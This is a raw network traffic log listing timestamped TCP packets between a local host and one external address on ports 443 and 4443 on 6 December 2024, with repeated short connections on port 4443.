Dec 6, 2024 22:14:10.940964937 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:10.940993071 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:10.941011906 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:10.993413925 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:10.993439913 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:10.993556023 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:10.993566990 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:10.993613958 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.038490057 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.038513899 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.038619995 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.038638115 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.038682938 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.044286013 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.044301987 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.044379950 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.044393063 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.044428110 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.051187038 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.051208019 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.051276922 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.051289082 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.051321983 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.111613035 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.111632109 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.111763000 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.111779928 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.111819983 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.117707014 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.117723942 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.117786884 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.117794037 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.117831945 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.124696970 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.124711990 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.124772072 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.124778032 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.124814034 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.131509066 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.131524086 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.131584883 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.131591082 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.131623030 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.185393095 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.185421944 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.185648918 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.185678959 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.185731888 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.230711937 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.230736971 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.230815887 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.230839014 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.230878115 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.236218929 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.236237049 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.236366034 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.236386061 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.236424923 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.236622095 CET	4443	50099	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.239660978 CET	50099	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.243534088 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.243558884 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.243633986 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.243644953 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.243680954 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.303715944 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.303736925 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.303771019 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.303797960 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.303811073 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.303829908 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.310570002 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.310585022 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.310628891 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.310638905 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.310674906 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.316677094 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.316693068 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.316741943 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.316752911 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.316787004 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.323523998 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.323539019 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.323569059 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.323579073 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.323605061 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.323618889 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.359752893 CET	4443	50099	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.359814882 CET	50099	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.377767086 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.377784014 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.377820015 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.377836943 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.377850056 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.377871037 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.383183956 CET	50100	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.422569990 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.422589064 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.422642946 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.422658920 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.422692060 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.428385019 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.428411007 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.428440094 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.428447008 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.428466082 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.428488970 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.435302019 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.435324907 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.435364962 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.435372114 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.435393095 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.435410976 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.496045113 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.496072054 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.496191025 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.496226072 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.496270895 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.502032042 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.502052069 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.502124071 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.502144098 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.502180099 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.503027916 CET	4443	50100	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.503123999 CET	50100	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.504964113 CET	50100	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.509001017 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.509023905 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.509059906 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.509071112 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.509104013 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.509125948 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.515861034 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.515876055 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.515938997 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.515944958 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.515968084 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.515999079 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.571331978 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.571352959 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.571403980 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.571429968 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.571441889 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.571477890 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.614900112 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.614922047 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.614962101 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.614969015 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.614990950 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.614998102 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.621354103 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.621371031 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.621413946 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.621417999 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.621444941 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.621499062 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.625025988 CET	4443	50100	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.627501011 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.627518892 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.627563000 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.627567053 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.627597094 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.627608061 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.688416004 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.688436031 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.688492060 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.688498974 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.688538074 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.695374012 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.695391893 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.695444107 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.695449114 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.695485115 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.701437950 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.701458931 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.701499939 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.701503992 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.701550961 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.701570988 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.708328962 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.708347082 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.708415985 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.708420038 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.708458900 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.710338116 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.710393906 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.710397959 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.710414886 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:11.710434914 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:11.710464001 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:12.007083893 CET	50098	443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:12.007117987 CET	443	50098	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:12.962136984 CET	4443	50100	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:12.967427015 CET	50100	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:13.087527037 CET	4443	50100	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:13.090127945 CET	50100	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:13.109752893 CET	50101	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:13.229660988 CET	4443	50101	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:13.229953051 CET	50101	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:13.238703012 CET	50101	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:13.358489990 CET	4443	50101	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:14.687602997 CET	4443	50101	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:14.694416046 CET	50101	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:14.814584970 CET	4443	50101	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:14.814671993 CET	50101	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:14.835248947 CET	50102	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:14.955120087 CET	4443	50102	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:14.955297947 CET	50102	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:14.957022905 CET	50102	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:15.077008963 CET	4443	50102	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:16.419425011 CET	4443	50102	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:16.421216011 CET	50102	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:16.542135000 CET	4443	50102	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:16.542191029 CET	50102	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:16.560184002 CET	50103	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:16.680273056 CET	4443	50103	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:16.680411100 CET	50103	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:16.682105064 CET	50103	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:16.801928043 CET	4443	50103	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:18.213695049 CET	4443	50103	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:18.215352058 CET	50103	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:18.335654020 CET	4443	50103	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:18.335738897 CET	50103	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:18.352174997 CET	50104	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:18.472268105 CET	4443	50104	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:18.472434998 CET	50104	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:18.477878094 CET	50104	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:18.597661018 CET	4443	50104	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:19.917018890 CET	4443	50104	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:19.918764114 CET	50104	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:20.038825989 CET	4443	50104	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:20.038892031 CET	50104	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:20.055131912 CET	50105	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:20.175522089 CET	4443	50105	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:20.175654888 CET	50105	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:20.177321911 CET	50105	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:20.297113895 CET	4443	50105	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:21.783751011 CET	4443	50105	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:21.785401106 CET	50105	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:21.907012939 CET	4443	50105	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:21.907129049 CET	50105	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:21.933954954 CET	50106	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:22.054682970 CET	4443	50106	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:22.054816961 CET	50106	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:22.056694031 CET	50106	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:22.176436901 CET	4443	50106	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:23.659586906 CET	4443	50106	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:23.662668943 CET	50106	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:23.782955885 CET	4443	50106	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:23.783042908 CET	50106	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:23.803368092 CET	50107	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:23.923211098 CET	4443	50107	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:23.923316956 CET	50107	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:23.924823046 CET	50107	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:24.044501066 CET	4443	50107	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:25.420092106 CET	4443	50107	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:25.424110889 CET	50107	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:25.544431925 CET	4443	50107	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:25.544512987 CET	50107	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:25.569607973 CET	50108	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:25.689527035 CET	4443	50108	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:25.689686060 CET	50108	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:25.696484089 CET	50108	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:25.816725969 CET	4443	50108	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:27.151818037 CET	4443	50108	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:27.155994892 CET	50108	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:27.277492046 CET	4443	50108	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:27.277569056 CET	50108	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:27.305376053 CET	50109	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:27.425163984 CET	4443	50109	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:27.425252914 CET	50109	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:27.426747084 CET	50109	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:27.546506882 CET	4443	50109	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:28.899471998 CET	4443	50109	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:28.901072979 CET	50109	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:29.021416903 CET	4443	50109	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:29.021481991 CET	50109	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:29.048017025 CET	50110	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:29.167680979 CET	4443	50110	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:29.167756081 CET	50110	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:29.169501066 CET	50110	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:29.289530039 CET	4443	50110	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:30.619853020 CET	4443	50110	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:30.621706963 CET	50110	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:30.741718054 CET	4443	50110	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:30.741811991 CET	50110	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:30.770772934 CET	50111	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:30.890580893 CET	4443	50111	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:30.890732050 CET	50111	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:30.893989086 CET	50111	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:31.013895035 CET	4443	50111	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:32.368727922 CET	4443	50111	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:32.370290041 CET	50111	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:32.490598917 CET	4443	50111	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:32.490708113 CET	50111	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:32.518618107 CET	50112	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:32.639420033 CET	4443	50112	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:32.639539003 CET	50112	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:32.640867949 CET	50112	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:32.760684013 CET	4443	50112	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:34.080501080 CET	4443	50112	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:34.082057953 CET	50112	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:34.202265978 CET	4443	50112	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:34.202349901 CET	50112	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:34.227344036 CET	50113	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:34.347243071 CET	4443	50113	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:34.347368956 CET	50113	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:34.348958969 CET	50113	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:34.468729973 CET	4443	50113	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:35.957807064 CET	4443	50113	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:35.959409952 CET	50113	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:36.079484940 CET	4443	50113	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:36.079607964 CET	50113	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:36.102674961 CET	50114	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:36.223608971 CET	4443	50114	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:36.223707914 CET	50114	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:36.225322008 CET	50114	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:36.345254898 CET	4443	50114	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:37.682198048 CET	4443	50114	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:37.683816910 CET	50114	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:37.803998947 CET	4443	50114	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:37.804214954 CET	50114	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:37.819333076 CET	50115	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:37.939048052 CET	4443	50115	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:37.939188957 CET	50115	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:37.940674067 CET	50115	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:38.060369015 CET	4443	50115	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:39.377999067 CET	4443	50115	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:39.379580021 CET	50115	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:39.501250982 CET	4443	50115	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:39.501339912 CET	50115	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:39.522639990 CET	50116	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:39.642570972 CET	4443	50116	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:39.642698050 CET	50116	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:39.644148111 CET	50116	4443	192.168.2.4	185.234.216.175
Dec 6, 2024 22:14:39.764017105 CET	4443	50116	185.234.216.175	192.168.2.4
Dec 6, 2024 22:14:41.106627941 CET	4443	50116	185.234.216.175	192.168.2.4
